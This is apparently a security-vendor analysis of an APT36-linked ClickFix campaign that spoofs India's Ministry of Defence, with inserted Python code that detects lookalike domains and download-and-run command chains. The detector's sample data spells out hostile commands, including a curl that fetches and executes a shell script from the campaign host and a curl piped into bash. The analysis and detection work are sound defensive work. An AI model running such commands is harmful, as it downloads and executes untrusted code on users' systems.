2025-07-21
Security Team
APT36-Linked ClickFix Attack Spoofs Indian Ministry of Defence to Target Windows and Linux
Cyber Attack

Alongside the cyberattacks attributed to APT36 amid Operation Sindoor, a retaliatory response to the Pahalgam terror attack orchestrated by Pakistan, a cyberattack campaign was also seen carried out by the alleged TAG-140, which overlaps with SideCopy, an operational subgroup assessed to be a sub-cluster or operational affiliate of Transparent Tribe (also tracked as APT36, ProjectM, or MYTHIC LEOPARD). Recent threat activity highlights the continued use of official branding and visual impersonation by threat actors to reduce user suspicion and facilitate malware deployment.

A campaign spoofing India’s Ministry of Defence employed a ClickFix-style infection chain to distribute cross-platform malware. The malicious infrastructure replicated legitimate government press release formats, staged payloads via a potentially compromised .in domain, and leveraged visual deception to maintain credibility throughout the attack lifecycle.

This campaign reflects broader trends observed in other ClickFix operations, notably the reuse of public sector branding, hosting of malware in web asset directories, and targeting of both Windows and Linux systems to broaden operational reach and effectiveness.

Initial Access Vector: Spoofed Ministry Press Release Portal

During domain reconnaissance targeting government-themed spoofing, Hunt.io identified the domain email.gov.in.drdosurvey[.]info delivering content that impersonates India’s Ministry of Defence. When accessed via a web browser, the domain presented a fraudulent page designed to closely mimic the Ministry’s legitimate press release archive, including a structurally similar layout and user interface.
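A defender-side check for this kind of lookalike, added here as an example and not code from the write-up or from Hunt.io: the hostname starts with the legitimate-looking labels email.gov.in, but the registrable domain is drdosurvey.info, so the test is on the right-hand end of the name rather than on what the prefix looks like. The suffix lists and every sample host except the first are constructed for illustration.

```python
# Constructed hostnames for illustration; only the first is from the write-up.
SAMPLE_HOSTS = [
    "email.gov.in.drdosurvey.info",   # spoof: registrable domain is drdosurvey.info
    "mod.gov.in",                      # genuine-style Ministry host
    "gov.in.example.test",             # constructed lookalike
    "drdosurvey.info",                 # same registrant, no spoofing prefix
]

# Public suffixes under which the registrable name is the third label from
# the right (assumed subset, not a full public suffix list).
MULTI_LABEL_SUFFIXES = {"gov.in", "nic.in", "co.in", "ac.in"}
# Suffixes we treat as genuinely governmental for this check.
TRUSTED_SUFFIXES = ("gov.in", "nic.in")


def registrable_domain(host: str) -> str:
    """Owner-controlled part of a hostname, e.g. 'drdosurvey.info'."""
    labels = host.lower().rstrip(".").split(".")
    if ".".join(labels[-2:]) in MULTI_LABEL_SUFFIXES:
        return ".".join(labels[-3:])
    return ".".join(labels[-2:])


def is_government_lookalike(host: str) -> bool:
    """True when a trusted suffix appears inside the name but does not end it."""
    host = host.lower().rstrip(".")
    if any(host == s or host.endswith("." + s) for s in TRUSTED_SUFFIXES):
        return False                                  # really under gov.in / nic.in
    labels = host.split(".")
    # e.g. email.gov.in.<attacker>: 'gov.in' is an interior label pair
    return any(".".join(labels[i:i + 2]) in TRUSTED_SUFFIXES
               for i in range(len(labels) - 1))


def lookalikes(hosts: list[str]) -> list[str]:
    """Filter a host list down to the spoofing candidates."""
    return [h for h in hosts if is_government_lookalike(h)]
```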

URL Path Comparison

·      Legitimate: /index.php/en/press-releases-ministry-defence-0

·      Malicious: /content/press-releases-ministry-defence-0.html

The adversaries attempted to replicate the Ministry’s historical press release archive, commonly listing documents from September 2023 to April 2025. However, only one hyperlink corresponding to March 2025 was functional on the spoofed page. The remaining entries displayed static placeholders marked "No Data," likely to maintain visual authenticity while focusing user interaction on the active malicious payload.


Analysis of the cloned portal’s source code revealed that the site was generated using HTTrack, an open-source website mirroring utility commonly used to duplicate legitimate web content. HTML metadata within the page source indicated the cloning activity likely took place in early March 2025.


The threat actors reconstructed the Ministry's public document archive, which typically indexes monthly press releases spanning September 2023 to April 2025. However, on the spoofed site, only a single hyperlink corresponding to March 2025 was functional; all other entries displayed a static "No Data" message, suggesting the remainder of the content was either non-functional filler or intended purely for visual authenticity.

ClickFix Technique Observations

Interaction with the sole active link on the cloned press release portal, labeled “March 2025”, triggers a ClickFix-style social engineering sequence. Upon selection, the user is redirected to one of two server-side PHP scripts based on their operating system:

·      Windows: /captcha/windows.php

·      Linux: /captcha/linux.php

This OS-aware branching behavior aligns with known ClickFix tactics, which tailor payload delivery and deception techniques to the target environment to increase the likelihood of successful execution.

Linux Flow: CAPTCHA Lure and Shell Command Execution

The Linux-specific page (/captcha/linux.php) displays a minimalistic interface featuring a single blue button labeled "I'm not a rebot"—a misspelling of "robot" that may be either an unintentional typographical error or a deliberate obfuscation tactic designed to evade automated detection and signature-based scanning.


Upon clicking the deceptive CAPTCHA button, a shell command is silently copied to the user’s clipboard. If pasted and executed in a terminal, the command retrieves a shell script named mapeal.sh from https://trade4wealth[.]in/admin/assets/js/, assigns execute permissions using chmod +x, and immediately initiates execution. The domain trade4wealth[.]in, used to host and deliver the payload, is assessed to be either compromised or abandoned, and has likely been repurposed to support malicious infrastructure.

Following the clipboard action, the user is redirected to linux-guide.php, which displays a verification overlay accompanied by step-by-step instructions designed to socially engineer execution of the script:

1.      Press ALT + F2

2.      Press CTRL + V

3.      Press Enter


The redirected page (linux-guide.php) represents the next stage of the ClickFix infection chain. It features a spoofed CAPTCHA overlay accompanied by step-by-step instructions designed to deceive users into executing the previously copied shell command from their clipboard.

Behind the overlay, the background consists of a static image that faintly displays a watermark from PCRisk, a legitimate cybersecurity information platform known for publishing threat analysis and malware removal guides. This visual element may serve as a social engineering tactic, intended to mimic a trustworthy security interface and reduce user skepticism during the execution process.

As of this writing, analysis of the Linux payload (mapeal.sh) reveals no overtly malicious behavior. Upon execution, the script simply downloads a JPEG image from the same hosting directory (https://trade4wealth[.]in/admin/assets/js/) and opens it in the background. No evidence of persistence mechanisms, system modification, network communication, or lateral movement was observed during dynamic analysis.
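Detection logic for the copied command chain described in the Linux flow above, added here as an example and not part of the original analysis: it flags process command lines that download a .sh file and then chmod +x it, run it, or pipe it into a shell within the same command, with extra context when the script sits under a web-asset directory or comes from a host named in this write-up. The sample command lines are constructed, and the regular expressions are heuristics rather than a vendor rule.

```python
import re

# Constructed sample command lines, shaped like a shell-audit or process log
# would record them; none is real telemetry. The first mimics the clipboard
# command described above: fetch a .sh from a web-asset path, chmod +x, run.
SAMPLE_CMDLINES = [
    "bash -c 'curl -s https://trade4wealth.in/admin/assets/js/mapeal.sh "
    "-o /tmp/mapeal.sh && chmod +x /tmp/mapeal.sh && /tmp/mapeal.sh'",
    "sh -c 'wget -q http://cdn.example.test/static/js/init.sh "
    "&& chmod +x init.sh && ./init.sh'",
    "curl -s https://example.test/install.sh | bash",
    "chmod +x ./build.sh && ./build.sh",
    "ls -la /home/user",
]

DOWNLOAD = re.compile(r"\b(curl|wget)\b[^|&;]*?(https?://[^\s'\"]+\.sh)\b", re.I)
CHMOD_EXEC = re.compile(r"\bchmod\s+\+x\b")
RUN_SCRIPT = re.compile(r"(?:^|&&|;|\|)\s*(?:\./|/tmp/|bash\s+|sh\s+)\S*\.sh\b")
PIPE_TO_SHELL = re.compile(r"\|\s*(?:ba)?sh\b")
# Web-asset directories of the kind used to stage the script in this campaign.
ASSET_PATH = re.compile(r"/(?:assets|static|js|css|images)/", re.I)
# Hosts named in the write-up, with the defanging brackets removed.
KNOWN_HOSTS = {"trade4wealth.in", "email.gov.in.drdosurvey.info"}


def clickfix_indicators(cmd: str) -> list[str]:
    """Reasons a command line resembles a ClickFix download-and-run chain."""
    m = DOWNLOAD.search(cmd)
    if not m:
        return []                      # no script download: not this pattern
    reasons = ["downloads a shell script"]
    host = re.sub(r"^https?://", "", m.group(2), flags=re.I).split("/")[0]
    if host.lower() in KNOWN_HOSTS:
        reasons.append(f"known campaign host {host.lower()}")
    if ASSET_PATH.search(m.group(2)):
        reasons.append("script staged under a web-asset directory")
    if CHMOD_EXEC.search(cmd):
        reasons.append("chmod +x in the same command")
    if RUN_SCRIPT.search(cmd):
        reasons.append("runs the script in the same chain")
    if PIPE_TO_SHELL.search(cmd):
        reasons.append("pipes the download straight into a shell")
    return reasons


def is_clickfix_chain(cmd: str) -> bool:
    """Download plus at least one execution step (chmod, run or pipe)."""
    r = clickfix_indicators(cmd)
    return bool(r) and any(x.startswith(("chmod", "runs", "pipes")) for x in r)
```

Running `is_clickfix_chain` over the samples alerts on the first three lines and leaves the plain `chmod`/`ls` lines alone; feeding it real process telemetry means adapting the path and host lists to your environment.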

Windows Flow: FOUO Warning and mshta-Based Payload Delivery

On Windows systems, clicking the active "March 2025" link redirects users to /captcha/windows.php, which displays a full-screen overlay simulating a government disclosure notice labeled “For Official Use Only (FOUO)”. This spoofed interface is designed to create a false sense of legitimacy and urgency, consistent with social engineering tactics commonly employed in ClickFix-style campaigns.

The background of the page features a blurred screenshot of the legitimate yoga.ayush.gov[.]in portal, an official site maintained by India’s Ministry of AYUSH to promote yoga and wellness initiatives. This visual mimicry likely aims to reinforce trust by associating the page with a recognized government domain.